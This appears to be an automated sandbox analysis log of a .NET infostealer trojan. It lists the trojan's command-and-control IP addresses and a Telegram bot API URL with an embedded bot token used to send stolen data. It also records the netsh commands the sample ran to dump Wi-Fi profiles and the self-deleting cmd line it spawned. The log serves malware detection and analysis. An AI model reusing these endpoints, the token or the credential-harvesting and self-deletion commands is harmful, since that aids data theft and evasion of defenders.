          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.4.50:8080/%79%72%41%42%59%5F%6A%6F%6E%65%73%40%38%34%31%36%31%38%5F%72%65%70%6F%72%74%
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.4.50:8080/3TJejBPXtn/yrABY_user
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.4.50:8080/get
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.4.50:8080/get/3TJejBPXtn/yrABY_user
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.4.50:8080/yrABY_user
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.4.50:8080/yrABY_user%40841618_report.wsr
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.4.50:80802a
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.205.24:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.230.176.97:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.216.92.21:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.110.16:9999
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.143.111:8080
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: BA9qyj2c9G.exe, 00000000.00000002.2021425648.000001186D5A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854C40000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line?fields=query
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011855079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://138.2.92.67:443
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://154.9.207.142:443
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://185.217.98.121:443
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://192.99.196.191:443
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135:443
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E95000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C4F000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011865182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011865182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.00000118651C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C4F000.00000004.00000800.00020000.00000000.sdmp, BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: BA9qyj2c9G.exe, 00000000.00000002.2016961001.0000011864C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2

          System Summary

          barindex
          .NET source code contains very large strings
          Source: BA9qyj2c9G.exe, vH.csLong String: Length: 16503
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B72E3E9 NtClose,0_2_00007FFD9B72E3E9
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B72B105 NtQueryInformationToken,0_2_00007FFD9B72B105
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B72B2F5 NtQueryInformationToken,0_2_00007FFD9B72B2F5
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B722BA30_2_00007FFD9B722BA3
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B73F9A20_2_00007FFD9B73F9A2
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B73E14A0_2_00007FFD9B73E14A
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B72EFEA0_2_00007FFD9B72EFEA
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B7272750_2_00007FFD9B727275
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B73D9CD0_2_00007FFD9B73D9CD
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess token adjusted: Load DriverJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess token adjusted: SecurityJump to behavior
          Source: BA9qyj2c9G.exe, 00000000.00000002.2022102806.000001186D744000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs BA9qyj2c9G.exe
          Source: BA9qyj2c9G.exe, 00000000.00000002.2022102806.000001186D744000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs BA9qyj2c9G.exe
          Source: BA9qyj2c9G.exe, 00000000.00000000.1638292606.0000011852F7C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameC6f29b175ed84c3a5113f54.exeL vs BA9qyj2c9G.exe
          Source: BA9qyj2c9G.exeBinary or memory string: OriginalFilenameC6f29b175ed84c3a5113f54.exeL vs BA9qyj2c9G.exe
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/3@2/7
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeCode function: 0_2_00007FFD9B72ED75 AdjustTokenPrivileges,0_2_00007FFD9B72ED75
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile created: C:\Users\user\AppData\Local\clg34ib74pJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeMutant created: NULL
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeMutant created: \Sessions\1\BaseNamedObjects\zs4je1nydq
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
          Source: BA9qyj2c9G.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: BA9qyj2c9G.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: BA9qyj2c9G.exe, 00000000.00000002.2014927487.0000011854BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: BA9qyj2c9G.exeReversingLabs: Detection: 68%
          Source: BA9qyj2c9G.exeVirustotal: Detection: 66%
          Source: unknownProcess created: C:\Users\user\Desktop\BA9qyj2c9G.exe "C:\Users\user\Desktop\BA9qyj2c9G.exe"
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\BA9qyj2c9G.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3Jump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\BA9qyj2c9G.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
